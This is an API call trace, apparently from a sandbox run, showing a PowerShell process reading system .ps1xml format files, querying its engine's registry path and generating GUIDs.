	[0815.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.861] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.862] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.863] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.864] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.864] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.864] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.864] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.865] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.866] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.867] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0xe67, lpOverlapped=0x0) returned 1
	[0815.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f4fe2f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f4fe2f*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0815.868] ReadFile (in: hFile=0x304, lpBuffer=0x2f50860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f50860*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0815.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x304) returned 0x0
	[0815.869] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0815.869] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0815.869] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1b7f8c30, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0815.869] CoTaskMemFree (pv=0x1b7f8c30) 
	[0815.869] RegCloseKey (hKey=0x304) returned 0x0
	[0815.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0815.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0815.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4129c1c1, Data2=0x455e, Data3=0x4836, Data4=([0]=0x89, [1]=0x9f, [2]=0x36, [3]=0x67, [4]=0xf8, [5]=0xc0, [6]=0x96, [7]=0xb0))) returned 0x0
	[0815.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa3ef981a, Data2=0x8388, Data3=0x4d50, Data4=([0]=0x86, [1]=0xcf, [2]=0x5d, [3]=0x95, [4]=0x89, [5]=0xe3, [6]=0xb4, [7]=0x8d))) returned 0x0
	[0815.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5e95ce4e, Data2=0x102d, Data3=0x433f, Data4=([0]=0xaa, [1]=0x83, [2]=0x2b, [3]=0x1e, [4]=0x64, [5]=0xeb, [6]=0x61, [7]=0x70))) returned 0x0
	[0815.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8e253f91, Data2=0xed88, Data3=0x4999, Data4=([0]=0xae, [1]=0x9c, [2]=0x2e, [3]=0x4d, [4]=0x2f, [5]=0xe0, [6]=0x77, [7]=0xe4))) returned 0x0
	[0815.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x94a729cf, Data2=0x6a0d, Data3=0x4727, Data4=([0]=0xb3, [1]=0x49, [2]=0x43, [3]=0x8c, [4]=0xbb, [5]=0x37, [6]=0xd7, [7]=0x87))) returned 0x0
	[0815.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x41015ddd, Data2=0x5abf, Data3=0x4feb, Data4=([0]=0xb2, [1]=0x38, [2]=0xec, [3]=0xaf, [4]=0xdf, [5]=0xdb, [6]=0xb9, [7]=0x46))) returned 0x0
	[0815.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x3ce8193e, Data2=0x830e, Data3=0x4b8d, Data4=([0]=0xb1, [1]=0xbe, [2]=0x3c, [3]=0x57, [4]=0x74, [5]=0x4b, [6]=0x4f, [7]=0x37))) returned 0x0
	[0815.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcce343cb, Data2=0x6e7a, Data3=0x4bbe, Data4=([0]=0x86, [1]=0xd2, [2]=0xfe, [3]=0x3c, [4]=0xd5, [5]=0xe5, [6]=0x19, [7]=0x33))) returned 0x0
	[0815.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x440d68ec, Data2=0xe2a7, Data3=0x4be1, Data4=([0]=0xbd, [1]=0x4c, [2]=0xab, [3]=0x30, [4]=0x7, [5]=0x4, [6]=0x38, [7]=0xe6))) returned 0x0
	[0815.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa7748abc, Data2=0x8669, Data3=0x4a9d, Data4=([0]=0xa5, [1]=0xe9, [2]=0x17, [3]=0xfb, [4]=0x57, [5]=0x14, [6]=0xa8, [7]=0x94))) returned 0x0
	[0815.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x53d9328b, Data2=0xfbdc, Data3=0x49f9, Data4=([0]=0x83, [1]=0x7e, [2]=0x99, [3]=0x35, [4]=0x8e, [5]=0xbf, [6]=0xbd, [7]=0x6d))) returned 0x0
	[0815.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x6b1036df, Data2=0x2627, Data3=0x4dfa, Data4=([0]=0x92, [1]=0x85, [2]=0x13, [3]=0x98, [4]=0x9c, [5]=0x9e, [6]=0xba, [7]=0xee))) returned 0x0
	[0815.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcf5a2ef2, Data2=0x6e57, Data3=0x43d3, Data4=([0]=0xb9, [1]=0x46, [2]=0xe0, [3]=0xab, [4]=0x8, [5]=0xff, [6]=0x2d, [7]=0x81))) returned 0x0
	[0815.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x46983d4f, Data2=0x2669, Data3=0x4363, Data4=([0]=0xb2, [1]=0xe4, [2]=0x24, [3]=0x76, [4]=0x91, [5]=0xd7, [6]=0xdb, [7]=0x99))) returned 0x0
	[0815.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x17ddaa14, Data2=0xd6b5, Data3=0x47a8, Data4=([0]=0x91, [1]=0xc0, [2]=0xa, [3]=0xe0, [4]=0x87, [5]=0xa7, [6]=0xb4, [7]=0xd8))) returned 0x0
	[0815.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc0352077, Data2=0x89ed, Data3=0x427b, Data4=([0]=0xa1, [1]=0x6e, [2]=0x7a, [3]=0x3a, [4]=0x54, [5]=0x1f, [6]=0x59, [7]=0xec))) returned 0x0
	[0815.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xbb5b85bb, Data2=0x8202, Data3=0x4b20, Data4=([0]=0xa6, [1]=0x16, [2]=0x18, [3]=0x8b, [4]=0x27, [5]=0x76, [6]=0x3f, [7]=0x48))) returned 0x0
	[0815.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x38a3ab8f, Data2=0x9f38, Data3=0x4c26, Data4=([0]=0xab, [1]=0x97, [2]=0xee, [3]=0x97, [4]=0x8c, [5]=0xf4, [6]=0x43, [7]=0x4b))) returned 0x0
	[0815.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb3dd79de, Data2=0x8de8, Data3=0x43ee, Data4=([0]=0x85, [1]=0x91, [2]=0x31, [3]=0xe2, [4]=0xe, [5]=0xf6, [6]=0x66, [7]=0x65))) returned 0x0
	[0815.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x75403ca1, Data2=0x6822, Data3=0x471e, Data4=([0]=0x8f, [1]=0xef, [2]=0xd3, [3]=0xc7, [4]=0x26, [5]=0xe3, [6]=0xce, [7]=0x22))) returned 0x0
	[0815.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x3e1c0c43, Data2=0xa225, Data3=0x4259, Data4=([0]=0x8f, [1]=0x79, [2]=0x20, [3]=0xac, [4]=0x30, [5]=0x58, [6]=0xe5, [7]=0x40))) returned 0x0
	[0815.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf103a8a3, Data2=0x9be0, Data3=0x40f2, Data4=([0]=0x9b, [1]=0x66, [2]=0x87, [3]=0xef, [4]=0x88, [5]=0x20, [6]=0x77, [7]=0x15))) returned 0x0
	[0815.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xd93d2511, Data2=0x76a2, Data3=0x4230, Data4=([0]=0xb6, [1]=0xf3, [2]=0x7d, [3]=0xf1, [4]=0x33, [5]=0x52, [6]=0xb7, [7]=0xb))) returned 0x0
	[0815.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2a287281, Data2=0xe38f, Data3=0x4ec0, Data4=([0]=0xb7, [1]=0xd5, [2]=0xc2, [3]=0x18, [4]=0x9, [5]=0xdc, [6]=0xf7, [7]=0x2d))) returned 0x0
	[0815.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x14b9dbde, Data2=0xb315, Data3=0x4537, Data4=([0]=0x81, [1]=0x7d, [2]=0xa1, [3]=0xcb, [4]=0x49, [5]=0x7f, [6]=0x61, [7]=0x66))) returned 0x0
	[0815.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x23a0161, Data2=0x6b8f, Data3=0x4253, Data4=([0]=0xac, [1]=0x4e, [2]=0xc0, [3]=0x81, [4]=0xe8, [5]=0x31, [6]=0x24, [7]=0x85))) returned 0x0
	[0815.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa90b23f9, Data2=0xcd12, Data3=0x4de9, Data4=([0]=0x83, [1]=0x7c, [2]=0xf9, [3]=0x87, [4]=0xb1, [5]=0x60, [6]=0xe, [7]=0x18))) returned 0x0
	[0815.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe52ac7ca, Data2=0x8c8, Data3=0x447b, Data4=([0]=0xac, [1]=0x32, [2]=0x99, [3]=0xe2, [4]=0x61, [5]=0xef, [6]=0xfb, [7]=0xba))) returned 0x0
	[0815.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x98ad6232, Data2=0x366f, Data3=0x41f3, Data4=([0]=0xa4, [1]=0xa5, [2]=0xa8, [3]=0x44, [4]=0x91, [5]=0xd1, [6]=0xed, [7]=0xbd))) returned 0x0
	[0815.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x1c94c5b1, Data2=0x79, Data3=0x4b89, Data4=([0]=0xb7, [1]=0xb, [2]=0x18, [3]=0xc6, [4]=0x9d, [5]=0x11, [6]=0x46, [7]=0x10))) returned 0x0
	[0815.876] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa0a71eae, Data2=0x1e3e, Data3=0x4228, Data4=([0]=0x95, [1]=0xad, [2]=0x1d, [3]=0x9f, [4]=0x81, [5]=0x5, [6]=0x3c, [7]=0x2f))) returned 0x0
	[0815.876] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa1691672, Data2=0x3e3f, Data3=0x4123, Data4=([0]=0xac, [1]=0xe6, [2]=0x6b, [3]=0xef, [4]=0x6e, [5]=0xcf, [6]=0xf6, [7]=0x91))) returned 0x0
	[0815.876] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4c480eb8, Data2=0xc66d, Data3=0x4f97, Data4=([0]=0x81, [1]=0x5a, [2]=0x59, [3]=0xe0, [4]=0x87, [5]=0xd2, [6]=0xbd, [7]=0xcd))) returned 0x0
	[0815.877] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb8fe16d6, Data2=0x6912, Data3=0x420e, Data4=([0]=0xa9, [1]=0x19, [2]=0x5f, [3]=0xdb, [4]=0xed, [5]=0x8c, [6]=0x63, [7]=0x46))) returned 0x0
	[0815.877] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x7d572127, Data2=0x187c, Data3=0x43b5, Data4=([0]=0x8a, [1]=0xcc, [2]=0xe9, [3]=0xb9, [4]=0x65, [5]=0x35, [6]=0x1d, [7]=0xe2))) returned 0x0
	[0815.877] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xfd52c37, Data2=0x80c2, Data3=0x4805, Data4=([0]=0x97, [1]=0xa, [2]=0xcb, [3]=0x51, [4]=0xfa, [5]=0xaf, [6]=0x73, [7]=0xe7))) returned 0x0
	[0815.878] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2be21d0d, Data2=0x4797, Data3=0x4844, Data4=([0]=0x9f, [1]=0x4a, [2]=0x21, [3]=0x5d, [4]=0x4f, [5]=0x2e, [6]=0x40, [7]=0x62))) returned 0x0
	[0815.878] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5d9eb45d, Data2=0x5fe6, Data3=0x4a7c, Data4=([0]=0x97, [1]=0x7, [2]=0x5d, [3]=0x2, [4]=0x6e, [5]=0x9b, [6]=0xab, [7]=0x93))) returned 0x0
	[0815.878] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x110b8202, Data2=0xd7fc, Data3=0x4c3e, Data4=([0]=0xb0, [1]=0x78, [2]=0xaf, [3]=0x41, [4]=0xf8, [5]=0x6e, [6]=0x7b, [7]=0xeb))) returned 0x0
	[0815.878] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb037e36a, Data2=0x95cb, Data3=0x475f, Data4=([0]=0x88, [1]=0x84, [2]=0xe9, [3]=0xfb, [4]=0xfb, [5]=0xa4, [6]=0xde, [7]=0x4e))) returned 0x0
	[0815.878] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe08dcefe, Data2=0x1ea7, Data3=0x4ea4, Data4=([0]=0xad, [1]=0xe5, [2]=0xba, [3]=0x21, [4]=0x76, [5]=0x87, [6]=0xc2, [7]=0x8b))) returned 0x0
	[0815.878] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x62f61151, Data2=0x11a6, Data3=0x4cd3, Data4=([0]=0x8c, [1]=0x8a, [2]=0xca, [3]=0xea, [4]=0x68, [5]=0x77, [6]=0xdc, [7]=0xd7))) returned 0x0
	[0815.879] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x1eb8fb69, Data2=0xebce, Data3=0x47e4, Data4=([0]=0xbc, [1]=0x15, [2]=0x6, [3]=0xd2, [4]=0xb2, [5]=0x16, [6]=0x73, [7]=0xfc))) returned 0x0
	[0815.879] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf7155eec, Data2=0x8b33, Data3=0x43e6, Data4=([0]=0x92, [1]=0xc7, [2]=0xf8, [3]=0xf6, [4]=0xd2, [5]=0x32, [6]=0x19, [7]=0x2b))) returned 0x0
	[0815.879] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb1eaec8, Data2=0xda49, Data3=0x4cfa, Data4=([0]=0xa8, [1]=0xfb, [2]=0x14, [3]=0x84, [4]=0x5f, [5]=0xcc, [6]=0x11, [7]=0x7a))) returned 0x0
	[0815.879] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9d0344a2, Data2=0x2e56, Data3=0x4aaa, Data4=([0]=0x87, [1]=0x59, [2]=0xf2, [3]=0x8a, [4]=0xd0, [5]=0xf1, [6]=0x91, [7]=0xff))) returned 0x0
	[0815.880] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe5dd3fa4, Data2=0xf3f1, Data3=0x461b, Data4=([0]=0xa9, [1]=0x70, [2]=0x1, [3]=0x33, [4]=0x11, [5]=0x75, [6]=0x84, [7]=0xd))) returned 0x0
	[0815.881] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x717bbeaa, Data2=0x686d, Data3=0x4927, Data4=([0]=0x9f, [1]=0xd5, [2]=0xed, [3]=0xbe, [4]=0x95, [5]=0x38, [6]=0xae, [7]=0xfe))) returned 0x0
	[0815.881] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0815.881] GetFileType (hFile=0x304) returned 0x1
	[0815.881] SetErrorMode (uMode=0x1) returned 0x1
	[0815.881] GetFileType (hFile=0x304) returned 0x1
	[0815.881] ReadFile (in: hFile=0x304, lpBuffer=0x30ae900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x30ae900*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.882] ReadFile (in: hFile=0x304, lpBuffer=0x30ae900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x30ae900*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0815.883] ReadFile (in: hFile=0x304, lpBuffer=0x30ae900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x30ae900*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0817.358] ReadFile (in: hFile=0x304, lpBuffer=0x30ae900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x30ae900*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0817.364] ReadFile (in: hFile=0x304, lpBuffer=0x2ef4e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2ef4e78*, lpNumberOfBytesRead=0x24d238*=0x8b4, lpOverlapped=0x0) returned 1
	[0817.364] ReadFile (in: hFile=0x304, lpBuffer=0x2ef4aec, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2ef4aec*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0817.365] ReadFile (in: hFile=0x304, lpBuffer=0x2ef4e78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2ef4e78*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0817.365] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x304) returned 0x0
	[0817.365] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0817.365] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0817.365] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1b7f8c30, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0817.365] CoTaskMemFree (pv=0x1b7f8c30) 
	[0817.365] RegCloseKey (hKey=0x304) returned 0x0
	[0817.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0817.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0817.366] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x74b16834, Data2=0x8e97, Data3=0x4a14, Data4=([0]=0x92, [1]=0xf8, [2]=0xe2, [3]=0x95, [4]=0x7e, [5]=0x7, [6]=0xe7, [7]=0x19))) returned 0x0
	[0817.366] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x516f9cc3, Data2=0x8ed2, Data3=0x4693, Data4=([0]=0x9b, [1]=0x29, [2]=0x96, [3]=0x95, [4]=0xac, [5]=0x8, [6]=0x20, [7]=0xf))) returned 0x0
	[0817.366] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0817.367] GetFileType (hFile=0x304) returned 0x1
	[0817.367] SetErrorMode (uMode=0x1) returned 0x1
	[0817.367] GetFileType (hFile=0x304) returned 0x1
	[0817.367] ReadFile (in: hFile=0x304, lpBuffer=0x2f2b908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f2b908*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0817.367] ReadFile (in: hFile=0x304, lpBuffer=0x2f2b908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f2b908*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0817.367] ReadFile (in: hFile=0x304, lpBuffer=0x2f2b908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f2b908*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
